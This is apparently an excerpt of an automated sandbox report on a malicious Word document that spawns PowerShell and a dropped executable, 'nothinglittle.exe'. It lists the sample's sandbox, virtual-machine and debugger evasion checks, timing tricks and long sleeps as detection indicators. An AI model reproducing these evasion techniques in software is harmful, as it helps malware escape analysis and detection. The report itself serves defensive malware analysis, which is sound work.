Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: RFL_PO 69002.doc Stream path 'Data' entropy: 7.9926896989 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00409A90 rdtsc 28_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4580 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1329 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe TID: 4604 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp Binary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.456979386.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000000.452020297.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: explorer.exe, 0000001D.00000000.452057636.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.457920896.00000000088C3000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp Binary or memory string: e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_00409A90 rdtsc 28_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 9_2_03021120 LdrInitializeThunk, 9_2_03021120
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h] 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h] 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h] 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h] 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012A4120 mov ecx, dword ptr fs:[00000030h] 28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01283138 mov ecx, dword ptr fs:[00000030h] 28_2_01283138
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h] 28_2_012B513A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h] 28_2_012B513A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h] 28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h] 28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h] 28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h] 28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h] 28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h] 28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h] 28_2_0128B171
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h] 28_2_0128B171
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h] 28_2_0135F1B5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h] 28_2_0135F1B5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h] 28_2_012B61A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h] 28_2_012B61A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h] 28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h] 28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h] 28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h] 28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h] 28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h] 28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h] 28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h] 28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AC182 mov eax, dword ptr fs:[00000030h] 28_2_012AC182
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012BA185 mov eax, dword ptr fs:[00000030h] 28_2_012BA185
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128519E mov eax, dword ptr fs:[00000030h] 28_2_0128519E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128519E mov ecx, dword ptr fs:[00000030h] 28_2_0128519E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01288190 mov ecx, dword ptr fs:[00000030h] 28_2_01288190
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B4190 mov eax, dword ptr fs:[00000030h] 28_2_012B4190
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134A189 mov eax, dword ptr fs:[00000030h] 28_2_0134A189
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0134A189 mov ecx, dword ptr fs:[00000030h] 28_2_0134A189
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012AD1EF mov eax, dword ptr fs:[00000030h] 28_2_012AD1EF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012831E0 mov eax, dword ptr fs:[00000030h] 28_2_012831E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h] 28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h] 28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h] 28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013141E8 mov eax, dword ptr fs:[00000030h] 28_2_013141E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov ecx, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h] 28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129C1C0 mov eax, dword ptr fs:[00000030h] 28_2_0129C1C0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h] 28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h] 28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h] 28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_0129B02A mov eax, dword ptr fs:[00000030h] 28_2_0129B02A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h] 28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h] 28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h] 28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h] 28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B002D mov eax, dword ptr fs:[00000030h] 28_2_012B002D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B4020 mov edi, dword ptr fs:[00000030h] 28_2_012B4020
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h] 28_2_01354015
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01354015 mov eax, dword ptr fs:[00000030h] 28_2_01354015
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h] 28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h] 28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01307016 mov eax, dword ptr fs:[00000030h] 28_2_01307016
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_01313019 mov eax, dword ptr fs:[00000030h] 28_2_01313019
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h] 28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h] 28_2_012B701D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 28_2_012B701D mov eax, dword ptr fs:[00000030h] 28_2_012B701D
